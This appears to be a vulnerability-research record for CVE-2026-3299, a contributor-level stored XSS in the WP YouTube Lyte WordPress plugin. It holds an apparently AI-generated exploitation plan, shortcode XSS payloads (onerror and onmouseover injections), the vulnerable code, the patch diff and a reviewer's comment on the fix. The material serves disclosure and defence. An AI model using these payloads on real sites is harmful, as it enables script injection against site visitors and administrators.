[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f98BP09sv57xdEaQ8vJ5Ax7KGlAJFAxvHeVyufhNgtC8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"source_links":35},"CVE-2026-3299","wp-youtube-lyte-authenticated-contributor-stored-cross-site-scripting-via-lyte-shortcode","WP YouTube Lyte \u003C= 1.7.29 - Authenticated (Contributor+) Stored Cross-Site Scripting via lyte Shortcode","The WP YouTube Lyte plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lyte' shortcode in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-youtube-lyte",null,"\u003C=1.7.29","1.7.30","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 12:25:22","2026-04-16 01:24:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fde09d051-d124-4397-bd1c-b193acd6c186?source=api-prod",1,[22,23],"readme.txt","wp-youtube-lyte.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3299 (WP YouTube Lyte Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WP YouTube Lyte** plugin (\u003C= 1.7.29) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the handling of the `[lyte]` shortcode attributes. When a user with Contributor-level permissions or higher includes the shortcode in a post, the plugin fails to sanitize or escape the attributes (such as `id`, `audio`, or `playlist`) before rendering them into the HTML output. This allows an attacker to break out of HTML attributes and inject malicious JavaScript that executes when any user (including administrators) views the post.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: Standard WordPress post editor (Gutenberg or Classic Editor).\n*   **Vulnerable Action**: Saving or updating a post\u002Fpage containing the `[lyte]` shortcode.\n*   **Vulnerable Parameter**: Attributes within the `[lyte]` shortcode (e.g., `id`, `audio`, `playlist`).\n*   **Authentication Level**: **Contributor+** (requires `edit_posts` capability).\n*   **Preconditions**: The plugin must be active. No specific settings are required to enable the shortcode.\n\n## 3. Code Flow\n1.  
**Registration**: The plugin registers the `[lyte]` shortcode (likely via `add_shortcode( 'lyte', 'shortcode_lyte' )` in the truncated portion of `wp-youtube-lyte.php`).\n2.  **Processing**: When a post is viewed, WordPress parses the content and calls the shortcode handler.\n3.  **Attribute Extraction**: The handler uses `shortcode_atts()` to extract user-supplied attributes like `id`, `audio`, and `playlist`.\n4.  **Rendering (Sink)**: The handler builds an HTML string (often a `div` with class `lyte`) to represent the player. It concatenates the extracted attributes into this string.\n5.  **Vulnerability**: The code fails to wrap the attribute values in `esc_attr()`. For example:\n    ```php\n    \u002F\u002F Vulnerable Pattern (Inferred)\n    return '\u003Cdiv class=\"lyte\" id=\"lyte_' . $atts['id'] . '\" data-id=\"' . $atts['id'] . '\">\u003C\u002Fdiv>';\n    ```\n6.  **Output**: The unescaped input is returned to the page content and rendered in the browser.\n\n## 4. Nonce Acquisition Strategy\nThis exploit involves a standard WordPress post-creation workflow. No custom plugin nonces are required for the injection, but the automated agent must handle the standard WordPress `_wpnonce` for saving posts.\n\n1.  **Login**: Authenticate as a **Contributor** user.\n2.  **Navigate**: Go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce**: Use `browser_eval` to extract the `_wpnonce` and `post_ID` from the editor page.\n    *   `_wpnonce`: `document.querySelector('#_wpnonce')?.value || wp.data.select('core\u002Feditor').getOption('nonce')`\n    *   `post_ID`: `document.querySelector('#post_ID')?.value`\n4.  **Note**: If using the Gutenberg editor, nonces are often handled via the REST API or localized into the `wpApiSettings` or `wp` global objects.\n\n## 5. 
Exploitation Strategy\nThe goal is to inject an event handler into the `id` or another attribute of the `[lyte]` shortcode.\n\n### Step 1: Login as Contributor\nUse the `http_request` tool to log in as a user with the Contributor role.\n\n### Step 2: Create a Post with Malicious Shortcode\nSubmit a POST request to `\u002Fwp-admin\u002Fpost.php` (or use the REST API) to save a post containing the payload.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `editpost`\n    *   `post_ID`: `[EXTRACTED_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_title`: `Lyte XSS Test`\n    *   `post_content`: `[lyte id='\">\u003Cimg src=x onerror=alert(document.domain)>' \u002F]`\n    *   `publish`: `Publish` (or `save` for draft)\n\n### Step 3: Trigger the XSS\nNavigate to the newly created post URL as an **Administrator**.\n\n## 6. Test Data Setup\n1.  **Plugin**: Ensure `wp-youtube-lyte` version 1.7.29 is installed and activated.\n2.  **User**: Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Environment**: No YouTube API key is required, as the shortcode rendering logic triggers before any API calls are made.\n\n## 7. Expected Results\n1.  When the post is rendered, the HTML source will contain a broken attribute:\n    ```html\n    \u003Cdiv class=\"lyte\" id=\"lyte_\">\u003Cimg src=x onerror=alert(document.domain)>\" ...>\n    ```\n2.  The browser will execute the `onerror` handler, displaying an alert box with the document domain.\n\n## 8. Verification Steps\n1.  **Manual Check**: Access the post as Admin and confirm the JS execution.\n2.  **WP-CLI Check**: Verify the content is stored exactly as injected.\n    *   `wp post get [POST_ID] --field=post_content`\n3.  
**Source Inspection**: Use `http_request` to fetch the post page and search for the unescaped payload:\n    *   `grep 'onerror=alert' response_body.html`\n\n## 9. Alternative Approaches\nIf the `id` attribute is sanitized via a strict regex (e.g., only 11 alphanumeric characters), target other attributes mentioned in `readme.txt` or `lyte_parse`:\n*   **Audio**: `[lyte id='_SQkWbRublY' audio='true\" onmouseover=\"alert(1)\" style=\"display:block;width:100px;height:100px;background:red;\"']`\n*   **Playlist**: `[lyte id='PLA486E741B25F8E00' playlist='true\" onmouseover=\"alert(1)\"']`\n*   **Arbitrary Parameters**: Try parameters processed in `lyte_parse` (line 123-131): `stepSize`, `showinfo`, `start`, `enablejsapi`, `hqThumb`.\n    *   Example: `[lyte id='_SQkWbRublY' showinfo='1\" onmouseover=\"alert(1)\"']`\n\nThese parameters are extracted using `preg_match` in `lyte_parse`, but the shortcode handler might pass them directly into the template before that logic applies.","The WP YouTube Lyte plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting via the 'lyte' shortcode. Due to insufficient input sanitization and output escaping on attributes such as 'id', 'start', and 'stepSize', an attacker with contributor-level access can inject arbitrary web scripts into posts that execute whenever a user views the affected page.","\u002F\u002F wp-youtube-lyte.php line 657\nfunction shortcode_lyte($atts) {\n    extract(shortcode_atts(array(\n        'id'        => '',\n        'audio'     => '',\n        'playlist'  => '',\n        'start'     => '',\n        'showinfo'  => '',\n        'stepsize'  => '',\n        'hqthumb'   => '',\n    ), $atts));\n\n    $qs = '';\n\n    if ($audio) { $proto = 'httpa'; } else { $proto = 'httpv'; }\n    if ( $start !== '' ) { $qs .= '&amp;start=' . $start; }\n    if ( $showinfo === 'false' ) { $qs .= '&amp;showinfo=0'; }\n    if ( $hqthumb ) { $qs .= '&amp;hqThumb=1'; }\n    if ( $stepsize ) { $qs .= '#stepSize=' . 
$stepsize; }\n    if ( $playlist ) { $action = 'playlist?list=';} else { $action = 'watch?v='; }\n\n    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . $id . $qs );\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-youtube-lyte\u002F1.7.29\u002Fwp-youtube-lyte.php\t2025-11-13 22:42:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-youtube-lyte\u002F1.7.30\u002Fwp-youtube-lyte.php\t2026-03-14 15:08:42.000000000 +0000\n@@ -657,13 +657,13 @@\n     $qs = '';\n \n     if ($audio) { $proto = 'httpa'; } else { $proto = 'httpv'; }\n-    if ( $start !== '' ) { $qs .= '&amp;start=' . $start; }\n+    if ( $start !== '' ) { $qs .= '&amp;start=' . esc_attr( $start ); }\n     if ( $showinfo === 'false' ) { $qs .= '&amp;showinfo=0'; }\n     if ( $hqthumb ) { $qs .= '&amp;hqThumb=1'; }\n-    if ( $stepsize ) { $qs .= '#stepSize=' . $stepsize; }\n+    if ( $stepsize ) { $qs .= '#stepSize=' . esc_attr( $stepsize ); }\n     if ( $playlist ) { $action = 'playlist?list=';} else { $action = 'watch?v='; }\n \n-    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . $id . $qs );\n+    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . esc_attr( $id ) . $qs );\n }","1. Authenticate as a user with at least Contributor-level privileges (e.g., ability to edit posts).\n2. Create a new post or edit an existing one using the WordPress editor.\n3. Embed the [lyte] shortcode using a malicious payload in the 'id' or 'start' attribute, such as: [lyte id='\">\u003Cimg src=x onerror=alert(document.domain)>' \u002F].\n4. Save the post as a draft or publish it.\n5. Navigate to the post's public URL (or have an administrator view it). 
The unescaped attribute will break out of the HTML tag's attributes, executing the injected JavaScript.","gemini-3-flash-preview","2026-04-16 15:33:57","2026-04-16 15:34:42",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","1.7.29","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags\u002F1.7.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-youtube-lyte.1.7.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags\u002F1.7.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-youtube-lyte.1.7.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags"]
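Review bot: in the hunk at `@@ -657,13 +657,13 @@`, the fix applies `esc_attr()` to `$start`, `$stepsize` and `$id` while they are being concatenated into a YouTube URL that is then handed to `lyte_parse()`, so HTML-attribute escaping happens one layer before the HTML is actually generated; whether the output is safe still depends on `lyte_parse()` not decoding or re-interpreting that string, which this hunk does not show. Since `$start` and `$stepsize` are numeric parameters and `$id` is a video or playlist identifier, validating them at this point (for example `$start = absint( $start );` and rejecting an `$id` that does not match the expected identifier characters) would make the intent explicit, and `esc_attr()` would then belong at the site in `lyte_parse()` that emits the attribute. `$audio` and `$playlist` are only tested for truthiness in the visible lines, so leaving them unescaped here is consistent with the hunk.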